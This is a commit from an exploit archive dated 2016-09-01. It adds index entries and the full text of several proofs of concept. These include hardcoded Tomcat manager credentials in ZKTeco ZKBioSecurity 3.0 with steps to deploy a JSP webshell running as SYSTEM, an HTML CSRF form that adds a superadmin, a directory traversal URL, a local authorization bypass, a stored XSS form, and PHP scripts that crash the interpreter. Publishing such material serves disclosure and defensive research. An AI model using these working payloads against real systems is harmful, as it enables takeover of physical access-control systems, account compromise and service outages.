DB: 2016-09-01
15 new exploits WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload PHP 5.0.0 - snmpwalkoid() Local Denial of Service PHP 5.0.0 - fbird_[p]connect() Local Denial of Service PHP 5.0.0 - snmpwalk() Local Denial of Service PHP 5.0.0 - snmprealwalk() Local Denial of Service PHP 5.0.0 - snmpset() Local Denial of Service PHP 7.0 - AppendIterator::append Local Denial of Service ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery ZKTeco ZKBioSecurity 3.0 - Directory Traversal ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service
This commit is contained in:
parent
1f0c845486
commit
3a2154afbd
35 changed files with 779 additions and 19 deletions
15
files.csv
15
files.csv
|
@ -36439,8 +36439,23 @@ id,file,description,date,author,platform,type,port
|
|||
40293,platforms/php/webapps/40293.txt,"chatNow - Multiple Vulnerabilities",2016-08-23,HaHwul,php,webapps,80
|
||||
40294,platforms/php/remote/40294.rb,"Phoenix Exploit Kit - Remote Code Execution (Metasploit)",2016-08-23,Metasploit,php,remote,80
|
||||
40309,platforms/multiple/dos/40309.txt,"Adobe Flash - Use-After-Free When Returning Rectangle",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40295,platforms/php/webapps/40295.txt,"WordPress CYSTEME Finder Plugin 1.3 - Arbitrary File Dislcosure/Arbitrary File Upload",2016-08-24,T0w3ntum,php,webapps,80
|
||||
40311,platforms/multiple/dos/40311.txt,"Adobe Flash - MovieClip Transform Getter Use-After-Free",2016-08-29,"Google Security Research",multiple,dos,0
|
||||
40312,platforms/php/webapps/40312.txt,"FreePBX 13.0.35 - SQL Injection",2016-08-29,i-Hmx,php,webapps,0
|
||||
40313,platforms/php/dos/40313.php,"PHP 5.0.0 - imap_mail() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
|
||||
40314,platforms/php/dos/40314.php,"PHP 5.0.0 - hw_docbyanchor() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
|
||||
40315,platforms/php/dos/40315.php,"PHP 5.0.0 - html_doc_file() Local Denial of Service",2016-08-30,"Yakir Wizman",php,dos,0
|
||||
40316,platforms/php/dos/40316.php,"PHP 5.0.0 - snmpwalkoid() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40317,platforms/php/dos/40317.php,"PHP 5.0.0 - fbird_[p]connect() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40318,platforms/php/dos/40318.php,"PHP 5.0.0 - snmpwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40319,platforms/php/dos/40319.php,"PHP 5.0.0 - snmprealwalk() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40320,platforms/php/dos/40320.php,"PHP 5.0.0 - snmpset() Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40321,platforms/php/dos/40321.php,"PHP 7.0 - AppendIterator::append Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
40322,platforms/windows/local/40322.txt,"ZKTeco ZKTime.Net 3.0.1.6 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
|
||||
40323,platforms/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,windows,local,0
|
||||
40324,platforms/jsp/webapps/40324.txt,"ZKTeco ZKBioSecurity 3.0 - Hardcoded Credentials Remote SYSTEM Code Execution",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40325,platforms/jsp/webapps/40325.html,"ZKTeco ZKBioSecurity 3.0 - (Add Superadmin) Cross-Site Request Forgery",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40326,platforms/jsp/webapps/40326.txt,"ZKTeco ZKBioSecurity 3.0 - Directory Traversal",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40327,platforms/jsp/webapps/40327.txt,"ZKTeco ZKBioSecurity 3.0 - (visLogin.jsp) Local Authorization Bypass",2016-08-31,LiquidWorm,jsp,webapps,0
|
||||
40328,platforms/jsp/webapps/40328.html,"ZKTeco ZKAccess Security System 5.3.1 - Persistent Cross-Site Scripting",2016-08-31,LiquidWorm,jsp,webapps,8088
|
||||
40329,platforms/php/dos/40329.php,"PHP 7.0 - JsonSerializable::jsonSerialize json_encode Local Denial of Service",2016-08-31,"Yakir Wizman",php,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
98
platforms/jsp/webapps/40324.txt
Executable file
98
platforms/jsp/webapps/40324.txt
Executable file
|
@ -0,0 +1,98 @@
|
|||
ZKTeco ZKBioSecurity 3.0 Hardcoded Credentials Remote SYSTEM Code Execution
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.0.1.0_R_230
|
||||
Platform: 3.0.1.0_R_230
|
||||
Personnel: 1.0.1.0_R_1916
|
||||
Access: 6.0.1.0_R_1757
|
||||
Elevator: 2.0.1.0_R_777
|
||||
Visitor: 2.0.1.0_R_877
|
||||
Video:2.0.1.0_R_489
|
||||
Adms: 1.0.1.0_R_197
|
||||
|
||||
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
|
||||
platform developed by ZKTeco. It contains four integrated modules: access
|
||||
control, video linkage, elevator control and visitor management. With an
|
||||
optimized system architecture designed for high level biometric identification
|
||||
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
|
||||
solution for a whole new user experience.
|
||||
|
||||
Desc: The ZKBioSecurity solution suffers from a use of hard-coded credentials.
|
||||
The application comes bundled with a pre-configured apache tomcat server and an
|
||||
exposed 'manager' application that after authenticating with the credentials:
|
||||
username: zkteco, password: zkt123, located in tomcat-users.xml file, it allows
|
||||
malicious WAR archive containing a JSP application to be uploaded, thus giving
|
||||
the attacker the ability to execute arbitrary code with SYSTEM privileges.
|
||||
|
||||
Ref: https://www.exploit-db.com/exploits/31433/
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/7.0.56
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5362
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5362.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
Contents of tomcat-users.xml:
|
||||
-----------------------------
|
||||
|
||||
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\conf\tomcat-users.xml:
|
||||
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
...
|
||||
...
|
||||
...
|
||||
<role rolename="manager-gui"/>
|
||||
<role rolename="manager-script"/>
|
||||
<role rolename="manager-jmx"/>
|
||||
<role rolename="manager-status"/>
|
||||
<user password="zkt123" roles="manager-gui,manager-script,manager-jmx,manager-status" username="zkteco"/>
|
||||
</tomcat-users>
|
||||
|
||||
-----------------------------
|
||||
|
||||
|
||||
Open Manager application and login:
|
||||
-----------------------------------
|
||||
|
||||
http://127.0.0.1:8088/manager (zkteco:zkt123)
|
||||
|
||||
|
||||
Deploy JSP webshell, issue command:
|
||||
-----------------------------------
|
||||
|
||||
- Request: whoami
|
||||
- Response: nt authority\system
|
||||
|
||||
|
||||
call the findConnectors() method of the Service use:
|
||||
----------------------------------------------------
|
||||
|
||||
http://127.0.0.1:8088/manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=
|
||||
|
||||
Response:
|
||||
|
||||
OK - Operation findConnectors returned:
|
||||
Connector[HTTP/1.1-8088]
|
||||
Connector[AJP/1.3-8019]
|
||||
|
||||
|
||||
List of all loaded servlets:
|
||||
----------------------------
|
||||
|
||||
http://127.0.0.1:8088/manager/jmxproxy/?j2eeType=Servlet
|
72
platforms/jsp/webapps/40325.html
Executable file
72
platforms/jsp/webapps/40325.html
Executable file
|
@ -0,0 +1,72 @@
|
|||
<!--
|
||||
|
||||
ZKTeco ZKBioSecurity 3.0 CSRF Add Superadmin Exploit
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.0.1.0_R_230
|
||||
Platform: 3.0.1.0_R_230
|
||||
Personnel: 1.0.1.0_R_1916
|
||||
Access: 6.0.1.0_R_1757
|
||||
Elevator: 2.0.1.0_R_777
|
||||
Visitor: 2.0.1.0_R_877
|
||||
Video:2.0.1.0_R_489
|
||||
Adms: 1.0.1.0_R_197
|
||||
|
||||
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
|
||||
platform developed by ZKTeco. It contains four integrated modules: access
|
||||
control, video linkage, elevator control and visitor management. With an
|
||||
optimized system architecture designed for high level biometric identification
|
||||
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
|
||||
solution for a whole new user experience.
|
||||
|
||||
Desc: The application interface allows users to perform certain actions via
|
||||
HTTP requests without performing any validity checks to verify the requests.
|
||||
This can be exploited to perform certain actions with administrative privileges
|
||||
if a logged-in user visits a malicious web site.
|
||||
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/7.0.56
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5364
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5364.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
-->
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://127.0.0.1:8088/authUserAction!edit.action" method="POST" enctype="multipart/form-data">
|
||||
<input type="hidden" name="authUser.username" value="thricer" />
|
||||
<input type="hidden" name="authUser.loginPwd" value="111111" />
|
||||
<input type="hidden" name="repassword" value="111111" />
|
||||
<input type="hidden" name="authUser.isActive" value="true" />
|
||||
<input type="hidden" name="authUser.isSuperuser" value="true" />
|
||||
<input type="hidden" name="groupIds" value="1" />
|
||||
<input type="hidden" name="deptIds" value="1" />
|
||||
<input type="hidden" name="areaIds" value="1" />
|
||||
<input type="hidden" name="authUser.email" value="lab@zeroscience.mk" />
|
||||
<input type="hidden" name="authUser.name" value="test" />
|
||||
<input type="hidden" name="authUser.lastName" value="lasttest" />
|
||||
<input type="hidden" name="fingerTemplate" value=" " />
|
||||
<input type="hidden" name="fingerId" value=" " />
|
||||
<input type="hidden" name="logMethod" value="add" />
|
||||
<input type="hidden" name="un" value="1471451964349_2769" />
|
||||
<input type="hidden" name="systemCode" value="base" />
|
||||
<input type="submit" value="Go" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
53
platforms/jsp/webapps/40326.txt
Executable file
53
platforms/jsp/webapps/40326.txt
Executable file
|
@ -0,0 +1,53 @@
|
|||
|
||||
ZKTeco ZKBioSecurity 3.0 File Path Manipulation Vulnerability
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.0.1.0_R_230
|
||||
Platform: 3.0.1.0_R_230
|
||||
Personnel: 1.0.1.0_R_1916
|
||||
Access: 6.0.1.0_R_1757
|
||||
Elevator: 2.0.1.0_R_777
|
||||
Visitor: 2.0.1.0_R_877
|
||||
Video:2.0.1.0_R_489
|
||||
Adms: 1.0.1.0_R_197
|
||||
|
||||
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
|
||||
platform developed by ZKTeco. It contains four integrated modules: access
|
||||
control, video linkage, elevator control and visitor management. With an
|
||||
optimized system architecture designed for high level biometric identification
|
||||
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
|
||||
solution for a whole new user experience.
|
||||
|
||||
Desc: File path manipulation vulnerabilities arise when user-controllable data
|
||||
is placed into a file or URL path that is used on the server to access
|
||||
local resources, which may be within or outside the web root. An attacker can
|
||||
modify the file path to access different resources, which may contain sensitive
|
||||
information. Even where an attack is constrained within the web root, it is often
|
||||
possible to retrieve items that are normally protected from direct access, such
|
||||
as application configuration files, the source code for server-executable scripts,
|
||||
or files with extensions that the web server is not configured to serve directly.
|
||||
|
||||
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/7.0.56
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5365
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5365.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://127.0.0.1:8088/baseAction!getPageXML.action?xmlPath=/vid/../WEB-INF/web.xml
|
80
platforms/jsp/webapps/40327.txt
Executable file
80
platforms/jsp/webapps/40327.txt
Executable file
|
@ -0,0 +1,80 @@
|
|||
ZKTeco ZKBioSecurity 3.0 (visLogin.jsp) Local Authorization Bypass
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 3.0.1.0_R_230
|
||||
Platform: 3.0.1.0_R_230
|
||||
Personnel: 1.0.1.0_R_1916
|
||||
Access: 6.0.1.0_R_1757
|
||||
Elevator: 2.0.1.0_R_777
|
||||
Visitor: 2.0.1.0_R_877
|
||||
Video:2.0.1.0_R_489
|
||||
Adms: 1.0.1.0_R_197
|
||||
|
||||
Summary: ZKBioSecurity3.0 is the ultimate "All in One" web based security
|
||||
platform developed by ZKTeco. It contains four integrated modules: access
|
||||
control, video linkage, elevator control and visitor management. With an
|
||||
optimized system architecture designed for high level biometric identification
|
||||
and a modern-user friendly UI, ZKBioSecurity 3.0 provides the most advanced
|
||||
solution for a whole new user experience.
|
||||
|
||||
Desc: The issue exist due to the way visLogin.jsp script processes the login
|
||||
request via the 'EnvironmentUtil.getClientIp(request)' method. It runs a check
|
||||
whether the request is coming from the local machine and sets the ip variable
|
||||
to '127.0.0.1' if equal to 0:0:0:0:0:0:0:1. The ip variable is then used as a
|
||||
username value with the password '123456' to authenticate and disclose sensitive
|
||||
information and/or do unauthorized actions.
|
||||
|
||||
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
|
||||
Microsoft Windows 7 Professional SP1 (EN)
|
||||
Apache-Coyote/1.1
|
||||
Apache Tomcat/7.0.56
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5367
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5367.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
C:\Program Files (x86)\BioSecurity\MainResource\tomcat\webapps\ROOT\visLogin.jsp:
|
||||
---------------------------------------------------------------------------------
|
||||
|
||||
1: <%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%>
|
||||
2: <%@page import="com.zk.common.util.EnvironmentUtil"%>
|
||||
3: <%
|
||||
4: String path = request.getContextPath();
|
||||
5: String basePath = request.getScheme()+"://"+request.getServerName()+":"+request.getServerPort()+path+"/";
|
||||
6:
|
||||
7: String ip= EnvironmentUtil.getClientIp(request);
|
||||
8: if("0:0:0:0:0:0:0:1".equals(ip))
|
||||
9: {
|
||||
10: ip = "127.0.0.1";
|
||||
11: }
|
||||
12:
|
||||
13: %>
|
||||
14: <jsp:include page="login.jsp"/>
|
||||
15: <script type="text/javascript" src="/vis/js/jquery.cookie.js"></script>
|
||||
16:
|
||||
17: <script>
|
||||
18: function autoLogin()
|
||||
19: {
|
||||
20: $.cookie('backUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
|
||||
21: $.cookie('customerBackUrl', "visRegistrationAction!registrationTouch.action?type=touch", { expires: 1 });
|
||||
22: var ip = "<%=ip%>";
|
||||
23: $("#userLoginForm input[name='username']").val(ip);
|
||||
24: $("#userLoginForm input[name='password']").val("123456");
|
||||
25: $('#userLoginForm').submit();
|
||||
26: }
|
||||
27: window.onload=autoLogin;
|
||||
28: </script>
|
||||
|
||||
---------------------------------------------------------------------------------
|
57
platforms/jsp/webapps/40328.html
Executable file
57
platforms/jsp/webapps/40328.html
Executable file
|
@ -0,0 +1,57 @@
|
|||
<!--
|
||||
|
||||
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability
|
||||
|
||||
|
||||
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd
|
||||
Product web page: http://www.zkteco.com
|
||||
Affected version: 5.3.12252
|
||||
|
||||
Summary: ZKAccess Systems are built on flexible, open technology to provide
|
||||
management, real-time monitoring, and control of your access control system-all
|
||||
from a browser, with no additional software to install. Our secure Web-hosted
|
||||
infrastructure and centralized online administration reduce your IT costs and
|
||||
allow you to easily manage all of your access points in a single location. C3-100's
|
||||
versatile design features take care of present and future needs with ease and
|
||||
efficiency. It is one of the most rugged and reliable controllers on the market,
|
||||
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps
|
||||
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000
|
||||
cardholders.
|
||||
|
||||
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly
|
||||
sanitised before being returned to the user. This can be exploited to execute
|
||||
arbitrary HTML and script code in a user's browser session in context of an affected
|
||||
site.
|
||||
|
||||
Tested on: CherryPy/3.1.0beta3 WSGI Server
|
||||
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016
|
||||
Python 2.6
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5368
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php
|
||||
|
||||
|
||||
18.07.2016
|
||||
|
||||
-->
|
||||
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">
|
||||
<input type="hidden" name="pk" value="None" />
|
||||
<input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" />
|
||||
<input type="hidden" name="holiday_type" value="1" />
|
||||
<input type="hidden" name="start_date" value="09/13/2016" />
|
||||
<input type="hidden" name="end_date" value="10/18/2016" />
|
||||
<input type="hidden" name="loop_by_year" value="2" />
|
||||
<input type="hidden" name="memo" value=""><script>alert(2)</script>" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
15
platforms/php/dos/40316.php
Executable file
15
platforms/php/dos/40316.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 snmpwalkoid() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
snmpwalkoid('127.0.0.1', 'public', $str);
|
||||
?>
|
16
platforms/php/dos/40317.php
Executable file
16
platforms/php/dos/40317.php
Executable file
|
@ -0,0 +1,16 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 fbird_[p]connect() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("interbase")) die("You need interbase extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
//fbird_connect($str);
|
||||
fbird_pconnect($str);
|
||||
?>
|
15
platforms/php/dos/40318.php
Executable file
15
platforms/php/dos/40318.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 snmpwalk() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
snmpwalk('127.0.0.1', 'public', $str);
|
||||
?>
|
15
platforms/php/dos/40319.php
Executable file
15
platforms/php/dos/40319.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 snmprealwalk() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
snmprealwalk('127.0.0.1', 'public', $str);
|
||||
?>
|
15
platforms/php/dos/40320.php
Executable file
15
platforms/php/dos/40320.php
Executable file
|
@ -0,0 +1,15 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 5.0.0 snmpset() Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 5.0.0
|
||||
## Download @ http://museum.php.net/php5/php-5.0.0-Win32.zip
|
||||
## Date: 26/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
if (!extension_loaded("snmp")) die("You need snmp extension loaded!");
|
||||
|
||||
$str = str_repeat('A', 9999);
|
||||
snmpset("localhost", 'public', $str, '', '');
|
||||
?>
|
12
platforms/php/dos/40321.php
Executable file
12
platforms/php/dos/40321.php
Executable file
|
@ -0,0 +1,12 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 7.0 AppendIterator::append Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
|
||||
## Date: 31/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
$tmp = new AppendIterator();
|
||||
$tmp->append($tmp); // Crash
|
||||
?>
|
17
platforms/php/dos/40329.php
Executable file
17
platforms/php/dos/40329.php
Executable file
|
@ -0,0 +1,17 @@
|
|||
<?php
|
||||
#############################################################################
|
||||
## PHP 7.0 JsonSerializable::jsonSerialize json_encode Local Denial of Service
|
||||
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
|
||||
## Date: 31/08/2016
|
||||
## Local Denial of Service
|
||||
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
|
||||
## http://www.black-rose.ml
|
||||
#############################################################################
|
||||
class jsonTmp implements JsonSerializable {
|
||||
function jsonSerialize() {
|
||||
$jsonTmp = new jsonTmp();
|
||||
return $jsonTmp;
|
||||
}
|
||||
}
|
||||
json_encode(new jsonTmp());
|
||||
?>
|
|
@ -1,4 +1,4 @@
|
|||
#==================================================================================================
|
||||
#==================================================================================================
|
||||
#!/usr/bin/perl
|
||||
use IO::Socket;
|
||||
#==================================================================================================
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";
|
||||
echo "by rgod rgod@autistici.org\r\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "X7 Chat <=2.0.4 'old_prefix' blind SQL injection / privilege escalation exploit\r\n";
|
||||
echo "by rgod rgod@autistici.org\r\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "ATutor <= 1.5.3.1 'links' blind SQL injection / admin credentials disclosure\n";
|
||||
echo "by rgod rgod@autistici.org\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
########################### www.system-defacers.org ###############
|
||||
########################### www.system-defacers.org ###############
|
||||
# Found By CeNGiZ-HaN cengiz-han@system-defacers.org
|
||||
# phpreactor 1.2.7 pl 1 pathtohomedir inclusion vulnerability
|
||||
############################################################################
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ MyNewsGroups :) v. 0.6b <= Remote File Inclusion
|
||||
+
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ TSEP 0.9.4.2
|
||||
+
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
+--------------------------------------------------------------------
|
||||
+--------------------------------------------------------------------
|
||||
+
|
||||
+ PHPAuction 2.1 Remote File Inclusion
|
||||
+
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#=================================================================
|
||||
#=================================================================
|
||||
#Voodoo chat 1.0RC1b <= (file_path) Remote File Inclusion Exploit
|
||||
#================================================================
|
||||
# |
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
TinyPHPForum 3.6 Admin Maker<br>
|
||||
TinyPHPForum 3.6 Admin Maker<br>
|
||||
By SirDarckCat from elhacker.net
|
||||
|
||||
<FORM method=post enctype="multipart/form-data">
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
Script: TSEP <= 0.942
|
||||
Script: TSEP <= 0.942
|
||||
URL: www.tsep.info
|
||||
Discovered: beford <xbefordx gmail com>
|
||||
Comments: "register_globals" must be enabled duh.
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
|
||||
echo "execution exploit\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
#!/usr/bin/php -q -d short_open_tag=on
|
||||
<?
|
||||
echo "MyBloggie <= 2.1.4 trackback.php multiple SQL injections vulnerability /\n";
|
||||
echo "administrative credentials disclosure exploit\n";
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
SQLiteWebAdmin
|
||||
SQLiteWebAdmin
|
||||
http://sourceforge.net/projects/sqlitewebadmin
|
||||
|
||||
SQLiteWebAdmin is a simple PHP program for administrating
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
|
||||
$$$$$$$$$$$$$$$ DEVIL TEAM THE BEST POLISH TEAM $$$$$$$$$$$$$$$
|
||||
$$
|
||||
$$ SAPID CMS <= v. 1.2.3.05 (root_path) Remote File Include Vulnerability
|
||||
$$ Script site: http://sapid.sourceforge.net/
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
|
||||
# Exploit Title: Koha Open Source ILS - Multiple XSS and XSRF Vulnerabilities
|
||||
# Google Dork:
|
||||
# Date: 25/06/2015
|
||||
